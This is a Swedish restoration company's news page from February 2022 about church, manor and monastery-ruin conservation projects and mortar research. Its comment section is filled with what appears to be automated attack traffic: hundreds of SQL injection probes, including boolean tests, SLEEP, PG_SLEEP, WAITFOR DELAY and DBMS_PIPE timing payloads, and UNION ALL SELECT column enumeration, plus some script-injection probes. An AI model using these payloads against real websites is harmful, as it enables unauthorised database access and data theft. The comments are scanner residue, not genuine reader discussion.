Nyheter fabruari 2022

Genomförda och pågående projekt

Den utvändiga restaureringen av Kroppa kyrka i Värmland (1882-84), åt Filipstads församling, är klar efter att ha genomförts i två etapper 2020-21. Vi har arbetat åt församlingen sedan 2007, och med denna kyrka sedan 2018.

Våren 2021 utfördes akuta mureriarbeten på tornet till Kungshamns kyrka (1879-80/1903-04) och hösten 2021 en ommurning av en del av koret till Smögens kyrka i Bohuslän (1904-05) åt Sotenäs pastorat.

Vi har arbetat åt pastoratet, och med dessa kyrkor sedan 2004.

Restaureringen av gårdsbyggnaderna på Fintatorp 2:26 på Skutberget i Karlstad (1761/1800-talets början) åt Karlstads kommun inleddes 2020, och pågår fortfarande. Ladugården och ladan restaurerades 2020-21. Just nu pågår arbeten med mangårdsbyggnaden dock utan vår medverkan.

Vi har arbetat i Värmland sedan 1996, och åt Karlstads kommun med detta projekt sedan 2018.

Restaureringen av Varnhems klosterruin (1148) åt Länsstyrelsen i Västra Götalands län inleddes 2021 med omläggning av kalkstensgolven i korsgången och Kapitelsalen. Övriga arbeten med ruinen fortsätter våren 2022 och beräknas pågå till 2024.

Närmast på tur för 2022 står bl.a. att restaurera vattenkanalen, golven i munkarnas arbetsrum, auditorium, och i Abbotthuset, samt med rester av murpartier runt om i ruinen.

Vi har arbetat åt, och i samarbete med Länsstyrelsen i Västra Götalands län sedan 1991, och med detta projekt sedan 2019.

2022 planeras två yttre restaureringar, dels av en del av Alströmerska magasinet i Alingsås (1731) åt Alingsås kommun, med en andra etapp 2023, dels av affärs- och bostadshuset på Kungsgatan 15 i Trollhättan (1910) åt det kommunala bostadsbolaget.

Vi har arbetat med Alströmerska magasinet sedan 2007, och åt Alingsås kommun sedan 1991, samt med Kungsgatan 15 i Trollhättan sedan 2019, och åt bostadsbolaget där sedan 1992.

Ett projekt som vi just nu arbetar med åt Alingsås kommun är ett planerat återskapande av takbalustraden åt parken åt söder på Nolhaga slott (1879-80). Den togs bort på 1930-talet.

Vi har arbetat med Nolhaga slott sedan 2004.

2023 planeras arbeten med tre kyrkor åt Tjörns pastorat i Bohuslän, den putsade fasaden på Huitfeldtska gravkoret på Valla kyrka (1663-64), samt renovering av träfasaderna på Klädesholmens och Rönnängs kyrkor (1793 och 1795).

Vi har arbetat åt pastoratet, och med Valla kyrka sedan 1998, samt med Klädesholmens och Rönnängs kyrkor sedan 2007.

Forskning och utveckling

Arbete pågår även med att avsluta ett FoU-projekt inför publicering ”Skydd och bevarande av kulturhistoriskt värdefulla bruk och brukstyper i Norden”.

Det blir en del av en planerad bok om Puts, mur- och fogbruk - Från analys till bevarande med Hantverkslaboratoriet vid Göteborgs universitet som utgivare med bidrag även av doktorerna Jan Erik Lindqvist på RISE, och Jonny Eriksson på Göteborgs universitet. Se FoU.

Sölve Johansson har tillsammans med fil.dr. Jan Erik Lindqvist på RISE utfört en undersökning av den utvändiga putsen på den välkända etiopiska grottkyrkan Yəmrəḥannä Krəstos (1000-talet). Den kommer att publiceras i en internationell bok om kyrkan.

Det är en gipsputs som nedtill vid marken bestrukits med bivax som fuktspärr. Prästerna i kyrkan ägnar sig åt biodling för produktion av honung, och bivax för bl.a. stöpning av vaxljus.

måndag, 10 januari 2022

Kommentarer

1 lördag, 15 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1'),'""".(( lördag, 22 januari 2022:

1'Lvbkhx<'">uCFnbn lördag, 22 januari 2022:

1) AND 6493=5837 AND (5616=5616 lördag, 22 januari 2022:

1) AND 1472=1472 AND (8207=8207 lördag, 22 januari 2022:

1 AND 4172=6153 lördag, 22 januari 2022:

1 AND 1472=1472 lördag, 22 januari 2022:

1 AND 7181=8669-- BVrp lördag, 22 januari 2022:

1 AND 1472=1472-- ebVA lördag, 22 januari 2022:

1') AND 7007=4050 AND ('LrTq'='LrTq lördag, 22 januari 2022:

1') AND 1472=1472 AND ('owrG'='owrG lördag, 22 januari 2022:

1' AND 7678=6876 AND 'qBCy'='qBCy lördag, 22 januari 2022:

1' AND 1472=1472 AND 'BDid'='BDid lördag, 22 januari 2022:

1%' AND 2590=3270 AND '%'=' lördag, 22 januari 2022:

1%' AND 1472=1472 AND '%'=' lördag, 22 januari 2022:

(SELECT (CASE WHEN (1058=8902) THEN 1058 ELSE 1058*(SELECT 1058 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) lördag, 22 januari 2022:

(SELECT (CASE WHEN (3291=3291) THEN 3291 ELSE 3291*(SELECT 3291 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) lördag, 22 januari 2022:

(SELECT CONCAT(0x7178626b71,(SELECT (ELT(4879=4879,1))),0x71716b7a71)) lördag, 22 januari 2022:

1);SELECT SLEEP(5)# lördag, 22 januari 2022:

1;SELECT SLEEP(5)# lördag, 22 januari 2022:

1');SELECT SLEEP(5)# lördag, 22 januari 2022:

1';SELECT SLEEP(5)# lördag, 22 januari 2022:

1%';SELECT SLEEP(5)# lördag, 22 januari 2022:

1);SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1;SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1');SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1';SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1%';SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1);WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1;WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1');WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1';WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1%';WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(122)||CHR(103)||CHR(102),5) FROM DUAL-- lördag, 22 januari 2022:

1) AND SLEEP(5) AND (3427=3427 lördag, 22 januari 2022:

1 AND SLEEP(5) lördag, 22 januari 2022:

1 AND SLEEP(5)-- nwxy lördag, 22 januari 2022:

1') AND SLEEP(5) AND ('DeZj'='DeZj lördag, 22 januari 2022:

1' AND SLEEP(5) AND 'wFow'='wFow lördag, 22 januari 2022:

1%' AND SLEEP(5) AND '%'=' lördag, 22 januari 2022:

1) AND 3386=(SELECT 3386 FROM PG_SLEEP(5)) AND (3931=3931 lördag, 22 januari 2022:

1 AND 3386=(SELECT 3386 FROM PG_SLEEP(5)) lördag, 22 januari 2022:

1 AND 3386=(SELECT 3386 FROM PG_SLEEP(5))-- vNge lördag, 22 januari 2022:

1') AND 3386=(SELECT 3386 FROM PG_SLEEP(5)) AND ('Pfus'='Pfus lördag, 22 januari 2022:

1' AND 3386=(SELECT 3386 FROM PG_SLEEP(5)) AND 'fJFR'='fJFR lördag, 22 januari 2022:

1%' AND 3386=(SELECT 3386 FROM PG_SLEEP(5)) AND '%'=' lördag, 22 januari 2022:

1) WAITFOR DELAY '0:0:5' AND (7186=7186 lördag, 22 januari 2022:

1 WAITFOR DELAY '0:0:5' lördag, 22 januari 2022:

1 WAITFOR DELAY '0:0:5'-- SVhV lördag, 22 januari 2022:

1') WAITFOR DELAY '0:0:5' AND ('TQpa'='TQpa lördag, 22 januari 2022:

1' WAITFOR DELAY '0:0:5' AND 'NQaZ'='NQaZ lördag, 22 januari 2022:

1%' WAITFOR DELAY '0:0:5' AND '%'=' lördag, 22 januari 2022:

1) AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5) AND (5165=5165 lördag, 22 januari 2022:

1 AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5) lördag, 22 januari 2022:

1 AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5)-- cSPF lördag, 22 januari 2022:

1') AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5) AND ('wIrU'='wIrU lördag, 22 januari 2022:

1' AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5) AND 'UcoM'='UcoM lördag, 22 januari 2022:

1%' AND 8431=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(65)||CHR(77)||CHR(86),5) AND '%'=' lördag, 22 januari 2022:

1) ORDER BY 1-- NvnX lördag, 22 januari 2022:

1) ORDER BY 7318-- piox lördag, 22 januari 2022:

1) UNION ALL SELECT NULL-- XxRG lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL-- uBSO lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL-- UNIw lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL-- pPUU lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- DCSw lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- XjcY lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hXYK lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JwRs lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hLee lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Ibhr lördag, 22 januari 2022:

1 ORDER BY 1-- rqhU lördag, 22 januari 2022:

1 ORDER BY 8988-- UCSG lördag, 22 januari 2022:

1 UNION ALL SELECT NULL-- mtYQ lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL-- VtNm lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL-- cGnb lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL-- bvNF lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- qXzA lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- EvNe lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ReHY lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IBrr lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- httE lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RhLI lördag, 22 januari 2022:

1 ORDER BY 1-- kfZp lördag, 22 januari 2022:

1 ORDER BY 7829-- ggfW lördag, 22 januari 2022:

1 UNION ALL SELECT NULL-- trJx lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL-- HVZI lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL-- xfEe lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL-- nKWp lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- plLI lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- CRlW lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Cxef lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WRfr lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- saxT lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uSog lördag, 22 januari 2022:

1') ORDER BY 1-- Brby lördag, 22 januari 2022:

1') ORDER BY 8101-- YqSC lördag, 22 januari 2022:

1') UNION ALL SELECT NULL-- HVJo lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL-- ZCqM lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL-- MBWP lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL-- dpAq lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- xoYo lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- OUxq lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- sGjS lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CXNM lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QcfV lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ycin lördag, 22 januari 2022:

1' ORDER BY 1-- Klyn lördag, 22 januari 2022:

1' ORDER BY 3461-- prVq lördag, 22 januari 2022:

1' UNION ALL SELECT NULL-- fUDn lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL-- fCQp lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL-- bnqq lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL-- ilMt lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- scol lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- dfSb lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HzVX lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- sBRD lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nYnU lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ucws lördag, 22 januari 2022:

1%' ORDER BY 1-- hQTn lördag, 22 januari 2022:

1%' ORDER BY 1307-- qalt lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL-- VBvb lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL-- iOqm lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL-- Ympk lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL-- qKew lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- pCww lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- NOpz lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zPvG lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vkQY lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IIac lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oWmJ lördag, 22 januari 2022:

1) ORDER BY 1# lördag, 22 januari 2022:

1) ORDER BY 9098# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 ORDER BY 1# lördag, 22 januari 2022:

1 ORDER BY 9662# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 ORDER BY 1# lördag, 22 januari 2022:

1 ORDER BY 2934# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') ORDER BY 1# lördag, 22 januari 2022:

1') ORDER BY 9480# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' ORDER BY 1# lördag, 22 januari 2022:

1' ORDER BY 2194# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' ORDER BY 1# lördag, 22 januari 2022:

1%' ORDER BY 5501# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

UYzMhV">1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

